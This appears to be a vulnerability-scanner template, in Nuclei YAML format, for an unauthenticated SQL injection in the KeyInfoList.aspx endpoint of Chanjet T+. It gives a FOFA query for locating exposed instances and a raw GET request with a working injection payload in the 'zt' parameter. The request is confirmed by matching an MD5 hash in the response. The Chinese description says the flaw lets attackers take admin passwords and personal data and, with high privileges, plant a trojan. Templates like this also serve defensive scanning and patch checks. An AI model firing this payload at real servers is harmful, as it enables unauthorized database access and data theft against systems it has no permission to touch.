id: changjietong-KeyInfoList_aspx-sql

info:
  name: 畅捷通T+ KeyInfoList.aspx SQL漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: app="畅捷通-TPlus"
    由于畅捷通T+的KeyInfoList.aspx接口处未对用户的输入进行过滤和校验，未经身份验证的攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488229&idx=1&sn=cbfbea3d12dfad4b19e6c89a9c44c3fb&chksm=c267a7d6f5102ec0c41e637d1e627522749e704cc03dae71a26047dcceb8c0cbe78ae19ce5f7&token=350950895&lang=zh_CN#rd
  tags: sql injection


http:
  - raw:
      - |
        GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

    matchers:
      - type: word
        part: body
        words:
          - 'e10adc3949ba59abbe56e057f20f883e'




